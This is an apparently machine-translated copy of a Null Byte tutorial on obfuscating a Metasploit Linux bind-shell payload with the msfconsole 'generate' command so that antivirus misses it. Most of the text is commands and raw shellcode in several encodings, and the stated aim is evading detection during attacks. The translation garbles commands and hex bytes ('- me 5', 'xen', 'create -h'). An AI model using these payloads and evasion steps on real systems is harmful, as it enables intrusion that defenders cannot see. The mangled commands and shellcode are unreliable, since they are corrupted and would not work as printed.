قالب وردپرس درنا توس
Home / Tips and Tricks / How to Use MSFconsole Generate Command to Obfuscate Payloads & Evode Antivirus Detection «Null Byte :: WonderHowTo

How to Use MSFconsole Generate Command to Obfuscate Payloads & Evode Antivirus Detection «Null Byte :: WonderHowTo



One of the things that distinguishes an experienced hacker from the script kiddies is the ability to effectively sneak past the antivirus defense mechanisms while performing an attack. One way is to use a custom shell code in an exploit. Not everyone is an expert in shell code writing, but luckily there is an easy way to do it both quickly and effectively.

Antivirus evasion is a vast field that some people devote their entire work to. It's a big part of exploit development, and it's certainly useful to try to avoid common defense mechanisms. One way to disguise payloads is to generate custom shell code. This method can be used when an exploit is rebuilt from scratch or when an existing exploit is used to better hide from antivirus software.

In Metasploit, the payload shell code can be generated within the framework. Today we will use msfconsole, probably the best known interface for Metasploit. When a payload is loaded, a few commands become available, including the Generate command, which this guide will focus on.

Generating a Payload

Let's first start Metasploit by entering "fire" msfconsole in the terminal . Once loaded, we can choose a payload. Most of the payload is fine, but for demonstration purposes we use a simple bind shell.

Type use payload / linux / x86 / shell_bind_tcp to load and focus the payload, followed by help to display the available commands:

  msf> use payload / linux / x86 / shell_bind_tcp
msf payload (linux / x86 / shell_bind_tcp)> Help

...

Payload Commands
================

Command Description
------- -----------
Check Check to see if a target is vulnerable
generate Generates a payload
Reload Reload the current module from the hard disk
to_handler Generates a handler with the specified payload 

The command we are interested in is generate so enter generate -h to display the various options available:

  msf payload (linux / x86 / shell_bind_tcp)> create -h
Use: generate [options]

Generates a payload.

OPTIONS:

-E Force Encoding.
-b  The list of characters to avoid: & # 39; x00  xff & # 39;
-e  The name of the encoder module to use.
-f  The name of the output file (otherwise stdout)
-h help banner.
-i  the number of coding iterations.
-k Protect the template as executable
-o  A comma-separated list of options in VAR = VAL format.
-p  The platform for the edition.
-s  NOP sled length.
-t  The output format: bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1
, py, python, raw, rb, ruby, sh, vbapplication vbscript , asp, aspx, aspx-exe, axis2, dll, eleven, eleven-so, exe, exe-only, exe-service, exe-small, hta-psh, jasper, jsp, loop-vbs, macho, msi msi nouac, osx-app, psh, psh-cmd, psh-network, psh-reflection, vba, vba-exe, vba-psh, vbs, was -x The Executable Template to Use

Option 1: Standard Generation

We can generate shellcode without options, although the likelihood that this payload can bypass modern antivirus software is likely to be fairly low. Below we see the size of the generated payload, 78 bytes, followed by some other settings and finally the raw shellcode.

  Generate msf payload (linux / x86 / shell_bind_tcp)>
# linux / x86 / shell_bind_tcp - 78 bytes
# http://www.metasploit.com
# VERBOSE = false, LPORT = 4444, RHOST =, PrependFork = false,
# PrependSetResuid = false, PrependSetReuid = false,
# PrependSetuid = false, PrependSetresgid = false,
# PrependSetregid = false, PrependSetgid = false,
# PrependChrootBreak = false, AppendExit = false
buf =
" x31  xdb  xf7  xe3  x53  x43  x53  x6a  x02  x89  xe1  xb0  x66  xcd" +
" x80  x5b  x5e  x52  x68  x02  x00  x11  x5c  x6a  x10  x51  x50  x89" +
" xe1  x6a  x66  x58  xcd  x80  x89  x41  x04  xb3  x04  xb0  x66  xcd" +
" x80  x43  xb0  x66  xcd  x80  x93  x59  x6a  x3f  x58  xcd  x80  x49" +
" x79  xf8  x68  x2f  x2f  x73  x68  x68  x2f  x62  x69  x6e  x89  xe3" +
" x50  x53  x89  xe1  xb0  x0b  xcd  x80" 

Option 2: Use Different Encoders

By default, Metasploit selects the best encoder for the job, but we can also give it which should be used to meet custom requirements. Enter show encoders to see a list of available encoders and their descriptions.

  msf payload (linux / x86 / shell_bind_tcp)> Show encoder

encoder
========

Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd / brace low Bash Brace Expansion Command Encoder
cmd / echo good echo command encoder
cmd / generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd / ifs lower Bourne $ {IFS} Substitution Command Encoder
cmd / perl normal Perl Command Encoder
cmd / powershell_base64 awarded Powershell Base64 Command Encoder
cmd / printf_php_mq manual printf (1) about php magic_quotes utility command encoder
generic / eicar manual The EICAR encoder
generic / none normal The encoder "none"
mipsbe / byte_xori normal byte XORi encoder
mipsbe / langxor normal XOR encoder
mipsle / byte_xori normal byte XORi encoder
Mipsle / langxor normal XOR encoder
php / base64 big PHP Base64 encoder
ppc / longxor normal PPC LongXOR encoder
ppc / longxor_tag normal PPC LongXOR encoder
Ruby / Base64 big Ruby Base64 encoder

... 

For example, we could use a simple XOR countdown encoder ( x86 / countdown ). Indicate the encoder to be used with the flag -e . The generated shellcode is a bit different now, except that it is slightly larger at 94 bytes.

  msf payload (linux / x86 / shell_bind_tcp)> generate -e x86 / countdown
# linux / x86 / shell_bind_tcp - 94 bytes
# http://www.metasploit.com
# Encoder: x86 / Countdown
# VERBOSE = false, LPORT = 4444, RHOST =, PrependFork = false,
# PrependSetResuid = false, PrependSetReuid = false,
# PrependSetuid = false, PrependSetresgid = false,
# PrependSetregid = false, PrependSetgid = false,
# PrependChrootBreak = false, AppendExit = false
buf =
" x6a  x4d  x59  xe8  xff  xff  xff  xf  xc1  x5e  x30  x4c  x0e  x07" +
" xe2  xfa  x30  xd9  xf4  xe7  x56  x45  x54  x62  x0b  x83  xea  xbc" +
" x6b  xc3  x8f  x4b  x4f  x40  x7b  x16  x15  x07  x4b  x72  x09  x4b" +
" x4b  x95  xfc  x74  x79  x78  xec  xa2  xaa  x65  x21  x95  x23  x98" +
" x4f  xe7  xab  x6f  x9d  x48  xe2  xb0  xa2  x6b  x59  x0b  x6d  xfb" +
" xb7  x71  x40  xc2  x53  x13  x12  x4d  x57  x28  x6e  x20  x2a  x2a" +
" xcc  xa5  x17  x1b  xc0  xab  xfb  x47  x80  xce" 

Option 3: Remove bad characters

Depending on the destination, certain characters may not be present in the payload. The null byte ( x00) almost always causes problems when present in a payload, except for rare cases. When generating a shell shell, use the -b flag to generate shellcode.

  msf payload (linux / x86 / shell_bind_tcp)> generate -b & # 39;  x00 & # 39;
# linux / x86 / shell_bind_tcp - 105 bytes
# http://www.metasploit.com
# Encoder: x86 / shikata_ga_nai
# VERBOSE = false, LPORT = 4444, RHOST =, PrependFork = false,
# PrependSetResuid = false, PrependSetReuid = false,
# PrependSetuid = false, PrependSetresgid = false,
# PrependSetregid = false, PrependSetgid = false,
# PrependChrootBreak = false, AppendExit = false
buf =
" xbb  xed  x04  xc7  xf5  xdd  xc7  xd9  x74  x24  xf4  x5a  x29  xc9" +
" xb1  x14  x31  x5a  x14  x83  xc2  x04  x03  x5a  x10  x0f  xf1  xf6" +
" x2e  x38  x19  xab  x93  x95  xb4  x4e  x9d  xf8  xf9  x29  x50  x7a" +
" xa2  xeb  x38  x12  x57  x14  xac  xbe  x3d  x04  x9f  x6e  x4b  xc5" +
" x75  xe8  x13  xcb  x0a  x7d  xe2  xd7  xb9  x79  x55  xb1  x70  x01" +
" xd6  x8e  xed  xcc  x59  x7d  xa8  xa4  x66  xda  x86  xb8  xd0  xa3" +
" xe0  xd0  xcd  x7c  x62  x48  x7a  xac  xe6  xe1  x14  x3b  x05  xa1" +
" xbb  xb2  x2b  xf1  x37  x08  x2b" 

We can omit several characters at the same time.

  msf payload (linux / x86 / shell_bind_tcp)> generate -b & # 39;  x00  xa1  x66  x81 & # 39;
# linux / x86 / shell_bind_tcp - 105 bytes
# http://www.metasploit.com
# Encoder: x86 / shikata_ga_nai
# VERBOSE = false, LPORT = 4444, RHOST =, PrependFork = false,
# PrependSetResuid = false, PrependSetReuid = false,
# PrependSetuid = false, PrependSetresgid = false,
# PrependSetregid = false, PrependSetgid = false,
# PrependChrootBreak = false, AppendExit = false
buf =
" xd9  xcf  xd9  x74  x24  xf4  x5d  x33  xc9  xb1  x14  xb8  xb8  x2e" +
" x24  x7f  x83  xc5  x04  x31  x45  x15  x03  x45  x15  x5a  xdb  x15" +
" xa4  x6d  xc7  x05  x19  xc2  x62  xa8  x14  x05  xc2  xca  xeb  x45" +
" x78  x4d  xa6  x2d  x7d  x71  x57  xf1  xeb  x61  x06  x59  x65  x60" +
" xc2  x3f  x2d  xae  x93  x36  x8c  x34  x27  x4c  xbf  x53  x8a  xcc" +
" xfc  x2b  x72  x01  x82  xdf  x22  xf3  xbc  x87  x19  x83  x8a  x4e" +
" x5a  xeb  x23  x9e  xe9  x83  x53  xcf  x6f  x3a  xca  x86  x93  xec" +
" x41  x10  xb2  xbc  x6d  xef  xb5" 

However, at some point, this feature has its limitations. If too many characters are not allowed, the payload may not be generated, resulting in the following error.

  [-] User Data Generation Failed: No Encoder Has Successfully Encoded the Buffer 

Recommended Book: "Metasploit: The Penetration Tester's Guide" by Amazon | Walmart

Option 4: Multiple iterations

Another useful technique for antivirus bypassing is the multi-pass payload encoding. This essentially takes the generated shell code and redirects it through the encoder with as many passes as defined. Use the flag -i to specify the number of iterations to encode the payload.

  msf payload (linux / x86 / shell_bind_tcp)> generate -b & # 39;  x00  xa1  x66  x81 & # 39; - me 5
# linux / x86 / shell_bind_tcp - 213 bytes
# http://www.metasploit.com
# Encoder: x86 / shikata_ga_nai
# VERBOSE = false, LPORT = 4444, RHOST =, PrependFork = false,
# PrependSetResuid = false, PrependSetReuid = false,
# PrependSetuid = false, PrependSetresgid = false,
# PrependSetregid = false, PrependSetgid = false,
# PrependChrootBreak = false, AppendExit = false
buf =
" xd9  xc6  xd9  x74  x24  xf4  x5f  xbd  x8  x20  x24  xe6  x33  xc9" +
" xb1  x2f  x31  x6f  x19  x83  xc7  x04  x03  x6f  x15  x6f  xd5  x9e" +
" x6e  x55  xa6  x85  xb5  x7e  x1f  x4d  x6e  x74  xff  x9f  xa7  xc5" +
" x28  xd1  x60  x30  x2a  x46  x9a  xb9  xeb  x6c  x46  xc0  x12  x1b" +
" x05  x33  xe7  x68  x65  x0c  xc3  x1e  xc6  xdb  xd9  x59  x5d  x6c" +
" x89  xd0  xc9  x26  xd4  x5d  x1d  xea  xe0  xbc  x1b  x7f  xee  x8d" +
" x5f  xaf  xd0  xb4  x9e  xec  x3f  x38  x83  x03  x9f  x44  xe4  x83" +
" x3f  xc9  x4f  x41  x2c  x4b  x94  x98  x5d  x4e  x27  x1f  x15  x76" +
" xb6  x12  xf5  xfd  xf4  x35  x9f  xfd  xa3  xd1  x93  xa3  x39  x6e" +
" x9c  xbe  xd6  xbc  xb0  x5a  x6b  x03  x52  x56  x7b  x54  x1b  xb6" +
" x3c  x4e  xc8  x1e  x30  xa5  x1f  xe3  x2e  x90  x78  x22  x7d  x67" +
" x08  x04  x91  x77  x7e  xde  xce  x4e  xa8  x5c  xa3  x77  x63  xe3" +
" x67  x41  x2d  x9c  x29  x0b  x57  x02  x23  x50  x1b  x8a  x82  xbe" +
" x0e  x5e  x8a  x96  x5e  x1d  x65  xbe  x3b  x51  x80  xa5  x0f  x8f" +
" x30  xdf  x12  xd0  x80  xa6  x4c  x1a  xf0  xc2  x17  xdd  xa3  x7d" +
" x2d  xc1  x0c" 

Option 5: Combining Options

Remember, when we generate shellcode, we can combine several options to improve our chances of getting around virus detection. If we look closely, the default list port for our bind shell is set to 4444. We can change this and any other option by using the -o flag, followed by the variable and setting the value. Let's set the listport to 1234.

  msf payload (linux / x86 / shell_bind_tcp)> generate -b & # 39; x00  xa1  x66  x81 & # 39; -i 5 -o lport = 1234
# linux / x86 / shell_bind_tcp - 213 bytes
# http://www.metasploit.com
# Encoder: x86 / shikata_ga_nai
# VERBOSE = false, LPORT = 1234, RHOST =, PrependFork = false,
# PrependSetResuid = false, PrependSetReuid = false,
# PrependSetuid = false, PrependSetresgid = false,
# PrependSetregid = false, PrependSetgid = false,
# PrependChrootBreak = false, AppendExit = false
buf =
" xb8  xee  x58  x02  xcc  xda  xcc  xd9  x74  x24  xf4  x5a  x2b  xc9" +
" xb1  x2f  x83  xea  xfc  x31  x42  x10  x03  x42  x10  x0c  xad  xd8" +
" x01  x6a  x27  x02  xd8  xa0  x61  xc8  xff  x40  xcf  x18  xc9  x19" +
" xd8  x6b  x9f  x43  x9a  x4a  x1b  x70  xca  x44  xc6  xea  x96  xe7" +
" x07  x35  x8e  x31  x9f  x37  x99  x0f  x70  xaa  xba  x48  xd9  x1b" +
" x88  xdd  xc2  x4f  x1a  xc7  xac  xb6  xe7  xd4  x86  xdd  x24  x1b" +
" xa0  x60  x51  x78  x01  x37  x50  x84  x39  xe3  xe1  x95  x18  x65" +
" xfb  x97  x75  xc2  x7f  x82  xcd  x93  xf1  x4e  x49  xff  x99  xen" +
" x85  x10  xf9  xad  x4c  xec  x37  xb4  x04  x1c  xb0  xc6  xcf  x55" +
" x6a  xa9  x68  xc6  x84  xad  xba  xfa  x59  x3a  x02  xbf  x32  x55" +
" x9d  x9f  x76  x80  x54  xd9  xcc  x03  x8c  x65  x2b  x8f  xdc  x4c" +
" xd9  x6f  x6f  x6e  x0e  x8a  x8a  xa8  x14  xb9  x2d  x70  x78  xed" +
" xa2  x24  xac  xf1  x15  xd0  x90  xeb  x38  x56  x52  x6b  xf3  xeb" +
" x77  x21  xeb  x3d  x64  xf9  xc3  x65  xe3  xab  x5c  xd5  xaa  x3d" +
" x07  xa0  x95  x3f  xd3  x9b  xc9  x48  x52  x0b  x15  x42  xa8  x2d" +
" x54  x01  x4f" 

Option 6: Output Formats

Another very useful feature is the ability to encode the payload in various output formats. A list of available formats is displayed when you call the help functions with command -h . For example, to generate shell code in Java format, we can use the flag -t . We can see that the output looks a little different than before, as the shellcode is now in a different format.

  msf payload (linux / x86 / shell_bind_tcp)> generate -b  x00  xa1  x66  x81 & # 39; -i 5 -o lport = 1234-t Java
/ *
* linux / x86 / shell_bind_tcp - 213 bytes
* http://www.metasploit.com
* Encoder: x86 / shikata_ga_nai
* VERBOSE = false, LPORT = 1234, RHOST =, PrependFork = false,
* PrependSetResuid = false, PrependSetReuid = false,
* PrependSetuid = false, PrependSetresgid = false,
* PrependSetregid = false, PrependSetgid = false,
* PrependChrootBreak = false, AppendExit = false
* /
Byte Buf [] = new byte []
{
(Byte) 0xbd, (byte) 0x47, (byte) 0xcc, (byte) 0x2b, (byte) 0x9a, (byte) 0xd9, (byte) 0xc7, (byte) 0xd9,
(Bytes) 0x74, (bytes) 0x24, (bytes) 0xf4, (bytes) 0x5a, (bytes) 0x33, (bytes) 0xc9, (bytes) 0xb1, (bytes) 0x2f,
(Bytes) 0x31, (bytes) 0x6a, (bytes) 0x14, (bytes) 0x83, (bytes) 0xea, (bytes) 0xfc, (bytes) 0x03, (bytes) 0x6a,
(Bytes) 0x10, (bytes) 0xa5, (bytes) 0x39, (bytes) 0xf0, (bytes) 0x4c, (bytes) 0x93, (bytes) 0x94, (bytes) 0x72,
(Bytes) 0x6d, (bytes) 0x33, (bytes) 0xc1, (bytes) 0x09, (bytes) 0xa9, (bytes) 0x47, (bytes) 0xaa, (bytes) 0xd8,
(Bytes) 0x78, (bytes) 0x16, (bytes) 0x63, (bytes) 0x98, (bytes) 0xbb, (bytes) 0x5c, (bytes) 0x45, (bytes) 0xce,
(Bytes) 0x2d, (bytes) 0x5f, (bytes) 0xf5, (bytes) 0xf8, (bytes) 0xb3, (bytes) 0xfc, (bytes) 0x59, (bytes) 0xd8,
(Bytes) 0x5c, (bytes) 0x95, (bytes) 0x72, (bytes) 0x82, (bytes) 0x0f, (bytes) 0x67, (bytes) 0xe9, (bytes) 0xfa,
(Bytes) 0x60, (bytes) 0xcd, (bytes) 0x43, (bytes) 0x0c, (bytes) 0xa8, (bytes) 0x89, (bytes) 0xe7, (bytes) 0xc5,
(Byte) 0xf7, (byte) 0x96, (byte) 0x64, (byte) 0x15, (byte) 0x65, (byte) 0x09, (byte) 0x99, (byte) 0x25,
(Byte) 0xe0, (byte) 0x91, (byte) 0xd2, (byte) 0x61, (byte) 0xc3, (byte) 0x9e, (byte) 0xed, (byte) 0xed,
(Bytes) 0x87, (bytes) 0xd4, (bytes) 0x83, (bytes) 0xbb, (bytes) 0x5d, (bytes) 0x46, (bytes) 0xaa, (bytes) 0x4d,
(Byte) 0x1a, (byte) 0xd9, (byte) 0x1a, (byte) 0x3c, (byte) 0xf9, (byte) 0xa5, (byte) 0x44, (byte) 0xb6,
(Bytes) 0x47, (bytes) 0xe2, (bytes) 0x82, (bytes) 0x58, (bytes) 0xe4, (bytes) 0xf7, (bytes) 0x30, (bytes) 0x9b,
(Byte) 0x6a, (byte) 0x0b, (byte) 0xa7, (byte) 0xf9, (byte) 0xb5, (byte) 0x23, (byte) 0x99, (byte) 0x54,
(Byte) 0xc6, (byte) 0x0f, (byte) 0x4a, (byte) 0x63, (byte) 0x08, (byte) 0xe3, (byte) 0xeb, (byte) 0xc4,
(Bytes) 0x39, (bytes) 0xa2, (bytes) 0xe7, (bytes) 0x1f, (bytes) 0x87, (bytes) 0x0e, (bytes) 0xc9, (bytes) 0x94,
(Byte) 0xc2, (byte) 0x1d, (byte) 0x39, (byte) 0xba, (byte) 0xd4, (byte) 0x98, (byte) 0x53, (byte) 0x5b,
(Byte) 0xfa, (byte) 0x42, (byte) 0x27, (byte) 0x10, (byte) 0xf1, (byte) 0x82, (byte) 0xd3, (byte) 0x7c,
(Bytes) 0x67, (bytes) 0x13, (bytes) 0x90, (bytes) 0xbc, (bytes) 0xaf, (bytes) 0xb6, (bytes) 0xcb, (bytes) 0x6b,
(Byte) 0x50, (byte) 0x62, (byte) 0xee, (byte) 0xaa, (byte) 0x80, (byte) 0x6e, (byte) 0x75, (byte) 0x5e,
(Bytes) 0x9b, (bytes) 0xcc, (bytes) 0xf6, (bytes) 0x3f, (bytes) 0xde, (bytes) 0xd9, (bytes) 0xa2, (bytes) 0xf2,
(Bytes) 0x8b, (bytes) 0x9d, (bytes) 0x1a, (bytes) 0x4b, (bytes) 0x9f, (bytes) 0xdc, (bytes) 0x96, (bytes) 0x69,
(Bytes) 0x74, (bytes) 0xfc, (bytes) 0x4f, (bytes) 0x18, (bytes) 0x72, (bytes) 0x35, (bytes) 0x88, (bytes) 0x71,
(Bytes) 0x46, (bytes) 0x31, (bytes) 0x5d, (bytes) 0x9b, (bytes) 0x44, (bytes) 0x34, (bytes) 0x46, (bytes) 0xec,
(Bytes) 0x1e, (bytes) 0xdd, (bytes) 0x8e, (bytes) 0xf9, (bytes) 0xb3, (bytes) 0xe0, (bytes) 0x51, (bytes) 0x4e,
(Byte) 0xb8, (byte) 0xee, (byte) 0x7b, (byte) 0x29, (byte) 0x1e
}; 

Option 7: Save as File

Finally, we have the ability to save the generated payload to a file instead of displaying it directly on the screen. Use the flag -f followed by the file path – in this case, the file titled "Payload" will be saved directly in the home directory.

  msf payload (linux / x86 / shell_bind_tcp)> generate -b & # 39;  x00  xa1  x66  x81 & # 39; -i 5 -o lport = 1234 -t java -f payload
[*] Write 3183 Bytes in Payload ... 

Will Antivirus Tools really work around this?

Virus Total is an online tool that can scan suspicious files to see if they are malicious or not. It combines many anti-virus products and tests uploaded files for known signatures in the database. We can see that the sample payload we've created for most antivirus software is clean again.

Please be aware that uploading a file in Virus Total to the database, so do not upload anything that you do not want to discover in the future. Feel free to play around with all the different options the generate command has to offer and have fun creating a totally unrecognizable payload.

Final Thoughts

Metasploit makes it easy to create custom shell code within msfconsole, obscuring user data and preventing virus detection. The generate command has many options, including the ability to restrict certain characters to multi-iterate encoding of payload data. Most of these options can be combined to create a payload that has a good chance of bypassing antivirus software – a goal that any would-be hacker should come to mind.

Cover Picture of insspirito / Pixabay; Screenshots of drd_ / zero byte

Source link